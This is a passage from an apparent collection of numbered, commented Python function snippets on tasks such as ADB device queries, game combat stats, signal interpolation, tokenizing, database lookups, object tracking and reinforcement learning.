            # .ix was removed from pandas; the fold indices are positional,
            # so .iloc is the correct replacement.
            model.fit(trainSet.iloc[tr].values, obs[tr])
            pred[vl] = model.predict_proba(trainSet.iloc[vl].values)[:, 1]
            fullpred[vl, :] = model.predict_proba(trainSet.iloc[vl].values)
        bestModel.updateModel(pred, fullpred, obs, model, trainSet.columns.values, tune, optMetric=optMetric)
    # Re-train the winning configuration on all training data.
    bestModel.model.fit(trainSet.values, obs)
    # Python-2 print statement converted to the print() function.
    print(bestModel)
    return {label: {'pred': pred, 'test_pred': bestModel.model.predict_proba(testSet)[:, 1]}}
29,431
def get_device_state():
    """Return the device status."""
    # Query ADB for the connection state; failures are logged by the executor.
    return execute_command(
        get_adb_command_line('get-state'),
        timeout=RECOVERY_CMD_TIMEOUT,
        log_error=True)
29,432
def character_state(combat, character):
    """
    Get the combat status of a single character, as a tuple of
    (current_hp, max_hp, total healing).
    """
    # Max HP = base HP plus every MAX_HP status effect in this combat.
    max_hp = Max_hp(character.base_hp)
    for effect in StatusEffect.objects.filter(character=character, combat=combat, effect_typ__typ='MAX_HP'):
        max_hp.hp += effect.effect_val

    # Current HP starts at max; wounds subtract, heals add.
    current_hp = Current_hp(max_hp.hp)
    for wound in Wound.objects.filter(character=character, combat=combat):
        current_hp.hp -= wound.amount

    total_healing = 0
    for heal in Heal.objects.filter(character=character, combat=combat):
        current_hp.hp += heal.amount
        total_healing += heal.amount

    return current_hp, max_hp, total_healing
29,433
def load_textfile(path):
    """Return the entire contents of the text file at ``path`` as a str.

    The file is opened with a context manager so the handle is closed even if
    reading raises (the original closed it manually, leaking on error).
    """
    with open(path, 'r') as f:
        return f.read()
29,434
def interp1d_to_uniform(x, y, axis=None):
    """Resample array to uniformly sampled axis. Has some limitations due to use
    of scipy interp1d.

    Args:
        x (vector): independent variable
        y (array): dependent variable, must broadcast with x
        axis (int): axis along which to resample

    Returns:
        xu: uniformly spaced independent variable
        yu: dependent resampled at xu
    """
    x = np.asarray(x)
    y = np.asarray(y)
    if axis is None:
        # Infer the sampling axis from x's shape (project helper).
        axis = mathx.vector_dim(x)
    num = x.shape[axis]
    mn = x.min(axis, keepdims=True)
    mx = x.max(axis, keepdims=True)
    # Limitation of scipy interp1d: it needs a strictly 1-D sample grid, so x
    # and the min/max bounds are squeezed down first. The assert below means
    # x must have exactly one non-unit dimension.
    x = x.squeeze()
    mn = mn.squeeze()
    mx = mx.squeeze()
    assert x.ndim == 1
    # num evenly spaced points spanning [mn, mx] inclusive.
    xu = np.arange(num)/(num - 1)*(mx - mn) + mn
    # bounds_error=False with no fill_value: out-of-range points become NaN.
    yu = scipy.interpolate.interp1d(x.squeeze(), y, axis=axis, bounds_error=False)(xu)
    return mathx.reshape_vec(xu, axis), yu
29,435
def get_walkthrought_dir(dm_path):
    """Recursively walk ``dm_path`` and index every file found.

    return 3 parameter:
        file_index[0]: total path infomation
        file_index[1]: file path directory
        file_index[2]: file name
    """
    return [
        [os.path.join(parent, name), parent, name]
        for parent, _, names in os.walk(dm_path)
        for name in names
    ]
29,436
def flatten_dict(d: Dict):
    """Recursively flatten dictionaries, ordered by keys in ascending order"""
    pieces = []
    for key in sorted(d):
        value = d[key]
        if value is None:
            # None values are skipped entirely.
            continue
        if isinstance(value, dict):
            pieces.append(f"{key}|{flatten_dict(value)}|")
        else:
            pieces.append(f"{key}|{value}|")
    return "".join(pieces)
29,437
def get_tokens(s):
    """
    Given a string containing xonsh code, generates a stream of relevant PLY
    tokens using ``handle_token``.
    """
    # Mutable lexer state shared with handle_token():
    #   indents: stack of indentation column levels
    #   last:    the previously emitted token
    #   pymode:  stack of (in_python_mode, opener, matcher, (line, col)) frames
    #   stream:  CPython tokenize stream over the UTF-8 encoded source
    state = {'indents': [0], 'last': None,
             'pymode': [(True, '', '', (0, 0))],
             'stream': tokenize(io.BytesIO(s.encode('utf-8')).readline)}
    while True:
        try:
            token = next(state['stream'])
            yield from handle_token(state, token)
        except StopIteration:
            # Normal end of input; an unclosed mode bracket is reported
            # as an ERRORTOKEN before terminating.
            if len(state['pymode']) > 1:
                pm, o, m, p = state['pymode'][-1]
                l, c = p
                e = 'Unmatched "{}" at line {}, column {}'
                yield _new_token('ERRORTOKEN', e.format(o, l, c), (0, 0))
            break
        except TokenError as e:
            # this is recoverable in single-line mode (from the shell)
            # (e.g., EOF while scanning string literal)
            yield _new_token('ERRORTOKEN', e.args[0], (0, 0))
            break
        except IndentationError as e:
            # this is never recoverable
            yield _new_token('ERRORTOKEN', e, (0, 0))
            break
29,438
def getPVvecs(fname):
    """
    Generates an ensemble of day long PV activities, sampled 3 different
    days for each complete pv data set.

    For every substation listed in the CSV at ``fname``, one day profile
    (48 half-hourly samples) is taken from each of June, July and August
    2014 and stored as a row of the result matrix.

    NOTE(review): datmat is fixed at 18 rows, which assumes at most
    6 substations (6 x 3 months) -- confirm against the data file.
    """
    datmat = np.zeros((18,48))
    df = dd.read_csv(fname)
    i = 0
    for unique_value in df.Substation.unique():
        # One sampled day per month; identical to the previously unrolled code.
        for month in ("2014-06", "2014-07", "2014-08"):
            ttemp, ptemp = PVgettimesandpower(month, unique_value, fname)
            t, p = trimandshift(ttemp, ptemp)
            datmat[i,:] = np.array(p)
            i += 1
    return datmat
29,439
def test_fqdn_url_without_domain_name():
    """ Test with invalid fully qualified domain name URL """
    schema = Schema({"url": FqdnUrl()})
    raised = False
    try:
        schema({"url": "http://localhost/"})
    except MultipleInvalid as e:
        raised = True
        assert_equal(
            str(e),
            "expected a fully qualified domain name URL for dictionary value @ data['url']")
    if not raised:
        assert False, "Did not raise Invalid for None URL"
29,440
def vis9(n): # DONE
    """Render three rows of 'O's, each one longer than the previous.

    Row k (k = 1..3) contains (n - 1) + k 'O' characters followed by a
    newline, e.g. for n=1:
        O
        OO
        OOO
    Total Os: 6 for n=1, 9 for n=2, 12 for n=3.
    """
    rows = ('O' * (n - 1) + 'O' * width + '\n' for width in (1, 2, 3))
    return ''.join(rows)
29,441
def derivative_circ_dist(x, p):
    """
    Derivative of circumferential distance and derivative function, w.r.t. p

    d/dp d(x, p) = d/dp min_{z in [-1, 0, 1]} (|z + p - x|)

    Args:
        x (float): first angle
        p (float): second angle

    Returns:
        float: d/dp d(x, p)
    """
    diff = p - x
    # Slope is -1 on (-inf, -0.5) and (0, 0.5); +1 on (0.5, inf) and
    # (-0.5, 0); 0 exactly at the kink points.
    if diff < -0.5 or 0 < diff < 0.5:
        return -1
    if diff > 0.5 or -0.5 < diff < 0:
        return 1
    return 0
29,442
async def test_temp_change_ac_trigger_on_not_long_enough_2(hass, setup_comp_5):
    """Test if temperature change turn ac on."""
    calls = _setup_switch(hass, False)
    await common.async_set_temperature(hass, 25)
    _setup_sensor(hass, 30)
    await hass.async_block_till_done()
    # The minimum cycle duration has not elapsed, so no switch call fires.
    assert len(calls) == 0
29,443
def get_MB_compatible_list(OpClass, lhs, rhs):
    """ return a list of metablock instance implementing an operation
        of type OpClass and compatible with format descriptor @p lhs and @p rhs
    """
    # Dispatch on the operation class; unknown classes raise KeyError.
    handlers = {
        Addition: get_Addition_MB_compatible_list,
        Multiplication: get_Multiplication_MB_compatible_list,
    }
    handler = handlers[OpClass]
    return handler(lhs, rhs)
29,444
def create_mock_target(number_of_nodes, number_of_classes):
    """
    Creating a mock target vector: one random class label in
    [0, number_of_classes - 1] per node.
    """
    labels = [random.randint(0, number_of_classes - 1)
              for _ in range(number_of_nodes)]
    return torch.LongTensor(labels)
29,445
def is_iterable(obj):
    """
    Return true if object has iterator but is not a string

    :param object obj: Any object
    :return: True if object is iterable but not a string.
    :rtype: bool
    """
    if isinstance(obj, str):
        return False
    return hasattr(obj, '__iter__')
29,446
def convert_loglevstr_to_loglevint(loglevstr):
    """Map a level name (case-insensitive) to its ``logging`` constant.

    :param loglevstr: level name such as "info" or "ERROR"
    :return: the matching ``logging`` level int, or ``logging.NOTSET``
        if we fail to match the string
    """
    # Single lookup table instead of five chained if/.lower() calls.
    levels = {
        "critical": logging.CRITICAL,
        "error": logging.ERROR,
        "warning": logging.WARNING,
        "info": logging.INFO,
        "debug": logging.DEBUG,
    }
    return levels.get(loglevstr.lower(), logging.NOTSET)
29,447
def get_operator_module(operator_string):
    """
    Get module name: everything before the final dot of a fully
    qualified 'package.operator' string.
    """
    # rpartition yields '' for the head when there is no dot at all,
    # which trips the assertion below exactly like the original split.
    operator_path, _, _ = operator_string.rpartition(".")
    assert len(operator_path) != 0, (
        "Please specify a format like 'package.operator' to specify your operator. You passed in '%s'"
        % operator_string
    )
    return operator_path
29,448
def is_fraction(obj):
    """Test whether the object is a valid fraction
    (an instance of :class:`fractions.Fraction` or a subclass).
    """
    matches = isinstance(obj, Fraction)
    return matches
29,449
def getExtrusion(matrix):
    """calculates DXF-Extrusion = Arbitrary Xaxis and Zaxis vectors

    Takes a transform matrix and derives the DXF arbitrary-axis data:
    the extrusion direction (normalized Z column) and the arbitrary
    X axis. Returns (Extrusion, AXaxis) where Extrusion is None when the
    Z axis already equals the world Z axis (no extrusion needed).
    """
    AZaxis = matrix[2].copy().resize3D().normalize() # = ArbitraryZvector
    Extrusion = [AZaxis[0],AZaxis[1],AZaxis[2]]
    if AZaxis[2]==1.0:
        # Z axis coincides with world Z: no extrusion, use the matrix X axis.
        Extrusion = None
        AXaxis = matrix[0].copy().resize3D() # = ArbitraryXvector
    else:
        # DXF Arbitrary Axis Algorithm: 1/64 is the standard threshold for
        # deciding whether the extrusion is "close to" the world Z axis.
        threshold = 1.0 / 64.0
        if abs(AZaxis[0]) < threshold and abs(AZaxis[1]) < threshold:
            # AXaxis is the intersection WorldPlane and ExtrusionPlane
            AXaxis = M_CrossVecs(WORLDY,AZaxis)
        else:
            AXaxis = M_CrossVecs(WORLDZ,AZaxis)
    #print 'deb:\n' #-------------
    #print 'deb:getExtrusion() Extrusion=', Extrusion #---------
    return Extrusion, AXaxis.normalize()
29,450
def _build_class_include(env, class_name):
    """
    Build a puppet ``class { ... }`` include definition for ``class_name``.

    If parentns::classname is included and fabric properties such as
        puppet_parentns__classname_prop = val1
    are set, the class included in puppet will be something like
        class { 'parentns::classname':
            prop => 'val1',
        }
    """
    include_def = "class { '%s': \n" % class_name
    property_prefix = _property_prefix(class_name)
    # env.iteritems() was Python 2 only; .items() is the py3 equivalent.
    for name, value in env.items():
        if name.startswith(property_prefix):
            property_name = name[len(property_prefix):]
            if not property_name.startswith("_"):  # else subclass property
                include_def += " %s => '%s',\n" % (property_name, value)
    include_def += "\n}"
    return include_def
29,451
async def mention_html(user_id, name):
    """
    Build an HTML mention link to a telegram user.

    The display name is HTML-escaped before being embedded.
    """
    escaped_name = escape(name)
    return f'<a href="tg://user?id={user_id}">{escaped_name}</a>'
29,452
def blaze_loader(alias):
    """
    Loader for BlazeDS framework compatibility classes, specifically
    implementing ISmallMessage.

    .. seealso:: `BlazeDS (external)
       <http://opensource.adobe.com/wiki/display/blazeds/BlazeDS>`_

    :since: 0.1
    """
    # Only the three BlazeDS small-message aliases are handled here;
    # returning None lets other registered loaders try the alias.
    if alias not in ['DSC', 'DSK', 'DSA']:
        return

    from plasma.flex.messaging.messages import small

    # NOTE(review): bare `reload` is a builtin only on Python 2; on Python 3
    # this needs importlib.reload -- confirm the supported interpreter.
    reload(small)

    return pyamf.get_class_alias(alias)
29,453
def get_user_pic(user_id, table):
    """Fetch a user's profile picture filename from the database.

    Args:
        user_id (int): User id
        table (str): Target table, either "admin" or "user".

    Returns:
        list | None: Result rows (each a dict), or None if the query failed.
    """
    # Defined up front so a failed query cannot raise NameError on return.
    records = None
    connection = None
    cursor = None
    try:
        connection = database_cred()
        # The original created the cursor twice; one dict cursor suffices.
        cursor = connection.cursor(dictionary=True)
        if table == "admin":
            cursor.execute(
                'SELECT admin_pic FROM admin WHERE admin_id=%s', (user_id,))
        if table == "user":
            cursor.execute(
                'SELECT user_pic FROM user WHERE user_id=%s', (user_id,))
        records = cursor.fetchall()
    except Error as e:
        print("parameterized query failed {}".format(e))
    finally:
        # Close the cursor before its connection, and only if they exist.
        if cursor is not None:
            cursor.close()
        if connection is not None and connection.is_connected():
            connection.close()
    return records
29,454
def convert_file_format(files,size):
    """
    Takes filename queue and returns an example from it using the TF Reader structure
    """
    # Shuffled queue of input filenames -> whole-file reader -> JPEG decode.
    filename_queue = tf.train.string_input_producer(files, shuffle=True)
    reader = tf.WholeFileReader()
    _, contents = reader.read(filename_queue)
    decoded = tf.image.decode_jpeg(contents)
    # Resize to a fixed square and pin the static shape for the graph.
    resized = tf.image.resize_images(decoded, [size, size])
    resized.set_shape((size, size, 3))
    return resized
29,455
def validate_access_rule(supported_access_types, supported_access_levels,
                         access_rule, abort=False):
    """Validate an access rule.

    :param access_rule: Access rules to be validated.
    :param supported_access_types: List of access types that are regarded
        valid.
    :param supported_access_levels: List of access levels that are
        regarded valid.
    :param abort: a boolean value that indicates if an exception should
        be raised whether the rule is invalid.
    :return: Boolean.
    """
    errmsg = _("Unsupported access rule of 'type' %(access_type)s, "
               "'level' %(access_level)s, 'to' %(access_to)s: "
               "%(field)s should be one of %(supported)s.")
    access_param = access_rule.to_dict()

    def validate(field, supported_tokens, excinfo):
        # Returns True when the rule's field value is allowed; otherwise logs
        # (and, with abort=True, raises the exception type from excinfo with
        # its message keyword filled from the formatted details string).
        if access_rule['access_%s' % field] in supported_tokens:
            return True

        access_param['field'] = field
        access_param['supported'] = ', '.join(
            "'%s'" % x for x in supported_tokens)
        if abort:
            LOG.error(errmsg, access_param)
            raise excinfo['type'](
                **{excinfo['about']: excinfo['details'] % access_param})
        else:
            LOG.warning(errmsg, access_param)
            return False

    # Both checks always run (when abort=False) so every problem is logged,
    # not just the first one found.
    valid = True
    valid &= validate(
        'type', supported_access_types,
        {'type': exception.InvalidShareAccess, 'about': "reason",
         'details': _(
             "%(access_type)s; only %(supported)s access type is allowed")})
    valid &= validate(
        'level', supported_access_levels,
        {'type': exception.InvalidShareAccessLevel, 'about': "level",
         'details': "%(access_level)s"})

    return valid
29,456
def track_viou_video(video_path, detections, sigma_l, sigma_h, sigma_iou, t_min, ttl, tracker_type,
                     keep_upper_height_ratio):
    """ V-IOU Tracker.
    See "Extending IOU Based Multi-Object Tracking by Visual Information by E. Bochinski, T. Senst, T. Sikora" for
    more information.

    Args:
         frames_path (str): path to ALL frames.
                            string must contain a placeholder like {:07d} to be replaced with the frame numbers.
         detections (list): list of detections per frame, usually generated by util.load_mot
         sigma_l (float): low detection threshold.
         sigma_h (float): high detection threshold.
         sigma_iou (float): IOU threshold.
         t_min (float): minimum track length in frames.
         ttl (float): maximum number of frames to perform visual tracking.
                      this can fill 'gaps' of up to 2*ttl frames (ttl times forward and backward).
         tracker_type (str): name of the visual tracker to use. see VisTracker for more details.
         keep_upper_height_ratio (float): float between 0.0 and 1.0 that determines the ratio of height of the object
                                          to track to the total height of the object used for visual tracking.

    Returns:
        list: list of tracks.
    """
    if tracker_type == 'NONE':
        assert ttl == 1, "ttl should not be larger than 1 if no visual tracker is selected"

    # Track pools: active (matched recently), extendable (lost but possibly
    # recoverable by backward visual tracking), finished (committed output).
    tracks_active = []
    tracks_extendable = []
    tracks_finished = []
    frame_buffer = []

    vid = cv2.VideoCapture(video_path)
    if not vid.isOpened():
        raise IOError("Couldn't open webcam or video")

    for frame_num, detections_frame in enumerate(tqdm(detections), start=1):
        # load frame and put into buffer
        # frame_path = frames_path.format(frame_num)
        # frame = cv2.imread(frame_path)
        return_value, frame = vid.read()
        if return_value != True:
            break
        if return_value:
            # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            # image = Image.fromarray(frame)
            # print('image:',image)
            pass
        else:
            raise ValueError("No image!")
        assert frame is not None, "could not read '{}'".format(frame_path)
        # Keep at most ttl+1 frames so backward tracking can look ttl back.
        frame_buffer.append(frame)
        if len(frame_buffer) > ttl + 1:
            frame_buffer.pop(0)

        # apply low threshold to detections
        dets = [det for det in detections_frame if det['score'] >= sigma_l]

        # IOU-based association of current detections to active tracks.
        track_ids, det_ids = associate(tracks_active, dets, sigma_iou)
        updated_tracks = []
        for track_id, det_id in zip(track_ids, det_ids):
            tracks_active[track_id]['bboxes'].append(dets[det_id]['bbox'])
            tracks_active[track_id]['max_score'] = max(tracks_active[track_id]['max_score'], dets[det_id]['score'])
            tracks_active[track_id]['classes'].append(dets[det_id]['class'])
            tracks_active[track_id]['det_counter'] += 1

            if tracks_active[track_id]['ttl'] != ttl:
                # reset visual tracker if active
                tracks_active[track_id]['ttl'] = ttl
                tracks_active[track_id]['visual_tracker'] = None

            updated_tracks.append(tracks_active[track_id])

        # Tracks without a matching detection: try to keep them alive with
        # the visual tracker for up to ttl frames.
        tracks_not_updated = [tracks_active[idx] for idx in set(range(len(tracks_active))).difference(set(track_ids))]

        for track in tracks_not_updated:
            if track['ttl'] > 0:
                if track['ttl'] == ttl:
                    # init visual tracker
                    track['visual_tracker'] = VisTracker(tracker_type, track['bboxes'][-1], frame_buffer[-2],
                                                         keep_upper_height_ratio)
                # viou forward update
                ok, bbox = track['visual_tracker'].update(frame)

                if not ok:
                    # visual update failed, track can still be extended
                    tracks_extendable.append(track)
                    continue

                track['ttl'] -= 1
                track['bboxes'].append(bbox)
                updated_tracks.append(track)
            else:
                tracks_extendable.append(track)

        # update the list of extendable tracks. tracks that are too old are moved to the finished_tracks. this should
        # not be necessary but may improve the performance for large numbers of tracks (eg. for mot19)
        tracks_extendable_updated = []
        for track in tracks_extendable:
            if track['start_frame'] + len(track['bboxes']) + ttl - track['ttl'] >= frame_num:
                tracks_extendable_updated.append(track)
            elif track['max_score'] >= sigma_h and track['det_counter'] >= t_min:
                tracks_finished.append(track)
        tracks_extendable = tracks_extendable_updated

        # Detections not matched to any track: before starting new tracks,
        # try to connect them backwards to an extendable track.
        new_dets = [dets[idx] for idx in set(range(len(dets))).difference(set(det_ids))]
        dets_for_new = []

        for det in new_dets:
            finished = False
            # go backwards and track visually
            boxes = []
            vis_tracker = VisTracker(tracker_type, det['bbox'], frame, keep_upper_height_ratio)

            for f in reversed(frame_buffer[:-1]):
                ok, bbox = vis_tracker.update(f)
                if not ok:
                    # can not go further back as the visual tracker failed
                    break
                boxes.append(bbox)

                # sorting is not really necessary but helps to avoid different behaviour for different orderings
                # preferring longer tracks for extension seems intuitive, LAP solving might be better
                for track in sorted(tracks_extendable, key=lambda x: len(x['bboxes']), reverse=True):

                    offset = track['start_frame'] + len(track['bboxes']) + len(boxes) - frame_num
                    # association not optimal (LAP solving might be better)
                    # association is performed at the same frame, not adjacent ones
                    if 1 <= offset <= ttl - track['ttl'] and iou(track['bboxes'][-offset], bbox) >= sigma_iou:
                        if offset > 1:
                            # remove existing visually tracked boxes behind the matching frame
                            track['bboxes'] = track['bboxes'][:-offset+1]
                        track['bboxes'] += list(reversed(boxes))[1:]
                        track['bboxes'].append(det['bbox'])
                        track['max_score'] = max(track['max_score'], det['score'])
                        track['classes'].append(det['class'])
                        track['ttl'] = ttl
                        track['visual_tracker'] = None

                        tracks_extendable.remove(track)
                        if track in tracks_finished:
                            del tracks_finished[tracks_finished.index(track)]
                        updated_tracks.append(track)

                        finished = True
                        break
                if finished:
                    break
            if not finished:
                dets_for_new.append(det)

        # create new tracks
        new_tracks = [{'bboxes': [det['bbox']], 'max_score': det['score'], 'start_frame': frame_num, 'ttl': ttl,
                       'classes': [det['class']], 'det_counter': 1, 'visual_tracker': None} for det in dets_for_new]
        tracks_active = []
        for track in updated_tracks + new_tracks:
            if track['ttl'] == 0:
                tracks_extendable.append(track)
            else:
                tracks_active.append(track)

    # finish all remaining active and extendable tracks
    tracks_finished = tracks_finished + \
                      [track for track in tracks_active + tracks_extendable
                       if track['max_score'] >= sigma_h and track['det_counter'] >= t_min]

    # remove last visually tracked frames and compute the track classes
    for track in tracks_finished:
        if ttl != track['ttl']:
            track['bboxes'] = track['bboxes'][:-(ttl - track['ttl'])]
        track['class'] = max(set(track['classes']), key=track['classes'].count)

        del track['visual_tracker']

    # debug
    # print(data)
    f = open('debug.txt', 'w')
    f.write(str(tracks_finished))
    f.close()

    return tracks_finished
29,457
def deduplicate(inp: SHAPE) -> SHAPE:
    """
    Remove duplicates from any iterable while retaining the order of elements.

    :param inp: iterable to deduplicate
    :return: new, unique iterable of same type as input

    Fix: for ``str`` input the previous code returned ``str(dict)`` (the
    repr of the key dict) instead of the deduplicated characters; strings
    are now rebuilt with ``"".join``.
    """
    unique = dict.fromkeys(inp)  # dicts preserve insertion order (py3.7+)
    if isinstance(inp, str):
        return "".join(unique)
    return type(inp)(unique)
29,458
def access_rules_synchronized(f):
    """Decorator for synchronizing share access rule modification methods."""

    def wrapped_func(self, *args, **kwargs):
        # The first positional argument is always a share dict with an 'id',
        # so the lock is scoped per share.
        lock_name = "share-access-%s" % args[0]['id']

        @utils.synchronized(lock_name)
        def locked_call(self, *args, **kwargs):
            return f(self, *args, **kwargs)

        return locked_call(self, *args, **kwargs)

    return wrapped_func
29,459
def import_python(path, package=None):
    """Get python module or object.

    Parameters
    ----------
    path : str
        Fully-qualified python path, i.e. `package.module:object`.
    package : str or None
        Package name to use as an anchor if `path` is relative.
    """
    module_path, _, attr = path.partition(':')
    if ':' in attr:
        # More than one ':' means more than one object qualifier.
        raise ValueError(
            f"Not a correct path ('{path}' has more than one object qualifier)")
    module = import_module(module_path, package=package)
    return getattr(module, attr) if attr else module
29,460
async def feature_flags_scope_per_request(
    request: Request, call_next: Callable[[Request], Awaitable[Response]]
) -> Response:
    """Use new feature flags copy for each request."""
    # Work on a per-request copy so the system-wide flags stay untouched
    # by any modifications made while handling this request.
    with ff_ctx as request_flags:
        # FastAPI provides its own dependency injection mechanism, but just
        # in case you are using starlette directly or there any other pure
        # ASGI middlewares.
        request.scope["feature_flags"] = request_flags
        return await call_next(request)
29,461
def test_md034_good_http_url_in_inline_link():
    """
    Test to make sure this rule does not trigger with a document that
    contains http urls in inline links.
    """
    # Arrange
    scanner = MarkdownScanner()
    supplied_arguments = [
        "scan",
        "test/resources/rules/md034/good_http_url_in_inline_link.md",
    ]

    # Act
    execute_results = scanner.invoke_main(arguments=supplied_arguments)

    # Assert: clean scan -> no output, no errors, exit code 0.
    execute_results.assert_results("", "", 0)
29,462
def fakepulsar(parfile, obstimes, toaerr, freq=1440.0, observatory="AXIS", flags="", iters=3):
    """Returns a libstempo tempopulsar object corresponding to a noiseless set
    of observations for the pulsar specified in 'parfile', with observations
    happening at times (MJD) given in the array (or list) 'obstimes', with
    measurement errors given by toaerr (us).

    A new timfile can then be saved with pulsar.savetim(). Re the other parameters:
    - 'toaerr' needs to be either a common error, or a list of errors
       of the same length of 'obstimes';
    - 'freq' can be either a common observation frequency in MHz, or a list;
       it defaults to 1440;
    - 'observatory' can be either a common observatory name, or a list;
       it defaults to the IPTA MDC 'AXIS';
    - 'flags' can be a string (such as '-sys EFF.EBPP.1360') or a list of
       strings; it defaults to an empty string;
    - 'iters' is the number of iterative removals of computed residuals from
       TOAs (which is how the fake pulsar is made...)"""

    import tempfile
    # delete=False so the file survives close() and can be reopened by
    # libstempo; it is removed explicitly at the end.
    outfile = tempfile.NamedTemporaryFile(delete=False)

    # Tempo2 .tim header lines (written as bytes; the file is binary-mode).
    outfile.write(b"FORMAT 1\n")
    outfile.write(b"MODE 1\n")

    obsname = "fake_" + os.path.basename(parfile)
    if obsname[-4:] == ".par":
        obsname = obsname[:-4]

    # One TOA line per observation; _geti picks element i when the argument
    # is a list, or returns the scalar unchanged.
    for i, t in enumerate(obstimes):
        outfile.write(
            "{0} {1} {2} {3} {4} {5}\n".format(
                obsname, _geti(freq, i), t, _geti(toaerr, i), _geti(observatory, i), _geti(flags, i)
            ).encode("ascii")
        )

    timfile = outfile.name
    outfile.close()

    pulsar = libstempo.tempopulsar(parfile, timfile, dofit=False)

    # Iteratively subtract the model residuals (converted from seconds to
    # days) so the TOAs match the model exactly, i.e. noiseless data.
    for i in range(iters):
        pulsar.stoas[:] -= pulsar.residuals() / 86400.0

        pulsar.formbats()

    os.remove(timfile)

    return pulsar
29,463
def get_scenes_need_processing(config_file, sensors):
    """
    A function which finds all the processing steps for all the scenes
    which haven't yet been undertaken. This is per scene processing rather
    than per step processing in the functions above. Steps include:

    * Download
    * ARD Production
    * Generating Tile Cache
    * Generating Quicklook images

    :param config_file: The EODataDown configuration file path.
    :param sensors: list of sensor string names to be processed.

    :returns: a list of lists where each scn has [config_file, scn_sensor, scn_id]

    """
    sys_main_obj = eodatadown.eodatadownsystemmain.EODataDownSystemMain()
    sys_main_obj.parse_config(config_file)

    tasks = []
    for sensor in sensors:
        sensor_obj = sys_main_obj.get_sensor_obj(sensor)
        # Set gives O(1) de-duplication (previously a linear list scan).
        scn_ids = set()

        def _add_scns(scns):
            # Queue every scene not already queued for this sensor.
            for scn in scns:
                if scn not in scn_ids:
                    tasks.append([config_file, sensor, scn])
                    scn_ids.add(scn)

        if sensor_obj.calc_scn_usr_analysis():
            _add_scns(sensor_obj.get_scnlist_usr_analysis())
        # BUGFIX: the tile-cache and quicklook scene lists were swapped with
        # their guard conditions in the original code.
        if sensor_obj.calc_scn_tilecache():
            _add_scns(sensor_obj.get_scnlist_tilecache())
        if sensor_obj.calc_scn_quicklook():
            _add_scns(sensor_obj.get_scnlist_quicklook())
        _add_scns(sensor_obj.get_scnlist_con2ard())
        _add_scns(sensor_obj.get_scnlist_download())
    return tasks
29,464
def Double_DQN(env, memory, q_net, t_net, optim, steps = 10000, eps = 1, disc_factor = 0.99,
               loss = torch.nn.MSELoss(), batch_sz = 128, tgt_update = 10, early = True,
               eps_decay = lambda eps, steps, step: eps - eps/steps,
               act = lambda s, eps, env, q_net: torch.tensor(env.action_space.sample()) if torch.rand(1) < eps else q_net(s).max(0)[1]):
    """
    Trains a neural network with Deep Q-Network algorithm

    Args:
        env         : openai gym environment
        memory      : Memory used to store samples, import from py_inforce.Generic.Memories
        q_net       : Neural Network to train, import from py_inforce.Generic.MLP
        t_net       : Target Net, copy of q_net
        optim       : Pytorch optimizer for q_net
        steps       : Integer, Max number of samples to collect. Default = 10_000
        eps         : Float, probability for epsilon greedy policy Default = 1
        disc_factor : Float, Discount factor aka gamma Default = 0.99
        loss        : Pytorch compatible loss function Default = torch.nn.MSELoss()
        batch_sz    : Int, number of samples for gradient descent
        tgt_update  : Int, number of samples between update of t_net
        early       : Bool, indicates if conditions for early termination should be checked.
                      At the moment the early termination is hardwired for the CartPole-v0
                      environment Default = True
        eps_decay   : Function of eps, steps and the current step, computes decayed epsilon
                      Default = linear decay from 1 to 0 against steps
        act         : Function of env state s, eps and env, determines action
                      Default = Epsilon greedy

    Note:
        Based on arXiv:1509.06461
    """
    optimizer = optim(q_net.parameters(), lr = q_net.lr)
    s = torch.tensor(env.reset(), dtype=torch.float32)
    for step in range(steps):
        # Epsilon-greedy action, environment step, then store the transition.
        a = act(s, eps, env, q_net)
        s_prime, r, done, _ = env.step(a.numpy())
        s_prime = torch.tensor(s_prime, dtype=torch.float32)
        eps = eps_decay(eps, steps, step)
        memory.push(s, a, r, s_prime, done)

        # Optimize
        if step >= batch_sz:
            s_, a_, r_, s_p, d_ = memory.sample(batch_sz)
            # TD target from the target network; (1 - d_) zeroes out the
            # bootstrap term for terminal transitions.
            y = r_ + disc_factor * t_net(s_p).max(1)[0] * (1 - d_)
            predictions = q_net(s_).gather(1, a_.long()).flatten()
            l = loss(y, predictions)
            optimizer.zero_grad()
            l.backward()
            optimizer.step()

        # Periodically sync the target network with the online network.
        if step % tgt_update == 0:
            t_net.load_state_dict(q_net.state_dict())

        # Test for early break
        if early and done:
            # NOTE(review): `state` is assigned from env.reset() but the
            # greedy rollout below reads and writes `s` instead -- the
            # first action of each eval episode uses a stale state.
            # Looks like a bug; confirm before relying on the eval score.
            ret = 0
            for _ in range(100):
                done = False
                state = torch.tensor(env.reset(), dtype=torch.float32)
                while not done:
                    s, r, done, _ = env.step(torch.argmax(q_net(s)).numpy())
                    s = torch.tensor(s, dtype=torch.float32)
                    ret += r
            # CartPole-v0 is considered solved at an average return of 195.
            if 195 <= ret/100:
                print('converged in %i steps' %step)
                break

        s = torch.tensor(env.reset(), dtype=torch.float32) if done else s_prime
29,465
def startingStateDistribution(env, N=100000):
    """
    This function samples initial states for the environment and computes
    an empirical estimator for the starting distribution mu_0.

    :param env: environment exposing ``reset()`` (returns an int state id
        in ``range(env.n_states)``) and ``n_states``
    :param N: number of reset() samples to draw
    :return: (n_states, 1) numpy array of empirical starting probabilities
    """
    mu_0 = np.zeros((env.n_states, 1))
    # Tally states directly: O(N) instead of the previous O(N * n_states)
    # list.count() scan. The resulting estimate is identical.
    for _ in range(N):
        mu_0[env.reset()] += 1
    mu_0 /= N
    return mu_0
29,466
